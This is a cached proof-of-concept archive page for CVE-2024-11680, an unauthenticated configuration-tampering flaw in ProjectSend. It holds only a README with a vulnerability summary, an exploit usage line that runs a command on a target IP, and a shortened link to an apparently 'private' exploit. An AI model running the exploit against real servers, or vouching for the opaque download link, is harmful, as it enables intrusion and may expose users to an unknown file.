Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-11680 PoC — ProjectSend 安全漏洞

Source
Associated Vulnerability
Title:ProjectSend 安全漏洞 (CVE-2024-11680)
Description:ProjectSend(cFTP)是ProjectSend开源的一套基于PHP和MySQL的自托管应用程序。 ProjectSend r1720之前版本存在安全漏洞,该漏洞源于受到身份验证漏洞的影响,远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求实现对应用程序配置的未经授权修改。
Description
CVE-2024-11680: Improper Authentication (CWE-287)
Readme
# CVE-2024-11680: Improper Authentication (CWE-287)


## Overview

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to options.php, enabling unauthorized modification of the application's configuration.


## Details
+ **CVE ID:** CVE-2024-11680
+ **Published:** 2024-11-26
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.8


## Vulnerability Description

Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript. This vulnerability has a high impact on confidentiality, integrity, and availability of the affected system. The attack vector is network-based, requires no user interaction, and can be executed with low attack complexity by an unauthenticated attacker.


## Affected Versions

**ProjectSend versions prior to r1720**


## Usage
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact
For inquiries, please contact famixcm@thesecure.biz

## Exploit
**[Download Here](https://bit.ly/49baipg)**
File Snapshot

[4.0K] /data/pocs/db578f6cce832be28db11768bb18d8b79f22fa4f └── [1.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.